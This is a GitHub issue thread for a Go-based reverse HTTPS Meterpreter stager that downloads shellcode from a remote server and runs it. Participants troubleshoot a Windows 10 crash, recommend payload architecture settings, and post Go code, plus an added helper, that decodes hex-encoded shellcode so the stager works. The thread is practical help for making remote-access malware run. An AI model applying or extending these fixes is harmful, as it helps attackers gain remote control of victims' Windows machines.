bogey3 / Golang_Reverse_HTTPS_Meterpreter

A reverse https meterpreter payload written in Go
MIT License

get crash when running on windows 10 #3

Closed ajeecai closed 1 year ago

ajeecai commented 1 year ago

With a proper shellcode downloading server set in the code, I compiled this repository with env GOOS=windows GOARCH=amd64 go build . When I run the output executable on Windows 10, I get a crash. Did you see this before?

Thanks

Exception 0xc0000005 0x0 0x1d 0xc0000b2000 PC=0xc0000b2000


bogey3 commented 1 year ago

It's still working for me; it looks like you might be using a 32-bit payload with a 64-bit stager. Try either setting GOARCH=386 instead of amd64, or make sure the payload you're using is windows/x64/meterpreter/reverse_https and not windows/meterpreter/reverse_https.

ajeecai commented 1 year ago

I have generated it with x64 meterpreter ... Now I found out, in downloadAndRun:

```go
// requires "encoding/hex" and "log" in the file's imports
data := GetExecutable(host, port, uuid)
tmp, err := hex.DecodeString(string(data)) // <- add this line: the served file is a hex string, not raw bytes
if err != nil {
	log.Fatal(err)
}
Run(tmp)
```

Because the shellcode file I put on my testing server is a string, not binary, it needs to be converted back to binary. Then it works; please feel free to close this issue.

Thanks
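The root cause ajeecai found, as an added example that is not code from this repository: a helper that tells a hex-text payload apart from raw bytes before anything reaches Run, and reports an empty or undecodable buffer instead of discarding hex.DecodeString's error (which is what produced the fault at PC == buffer address in the report above). The names prepareShellcode and looksLikeHex are assumptions; GetExecutable and Run are the repository's own.

```go
package main

import (
	"bytes"
	"encoding/hex"
	"errors"
	"fmt"
)

// looksLikeHex reports whether buf is entirely ASCII hex digits
// (after trimming surrounding whitespace, since a file served as text
// usually carries a trailing newline). Name is an assumption.
func looksLikeHex(buf []byte) bool {
	buf = bytes.TrimSpace(buf)
	if len(buf) == 0 || len(buf)%2 != 0 {
		return false
	}
	for _, c := range buf {
		switch {
		case c >= '0' && c <= '9', c >= 'a' && c <= 'f', c >= 'A' && c <= 'F':
		default:
			return false
		}
	}
	return true
}

// prepareShellcode normalises what GetExecutable returned into raw bytes.
// A hex-text file (the case in this issue) is decoded; raw bytes pass
// through unchanged; an empty or undecodable buffer is returned as an
// error rather than handed to Run. Name is an assumption.
func prepareShellcode(data []byte) ([]byte, error) {
	trimmed := bytes.TrimSpace(data)
	if len(trimmed) == 0 {
		return nil, errors.New("empty payload from server")
	}
	if looksLikeHex(trimmed) {
		raw, err := hex.DecodeString(string(trimmed))
		if err != nil {
			return nil, fmt.Errorf("payload looked like hex but did not decode: %w", err)
		}
		return raw, nil
	}
	return data, nil
}
```

A buffer that is printable text is exactly the case that faults when executed, so the decode step belongs between GetExecutable and Run rather than being left to the server's file format.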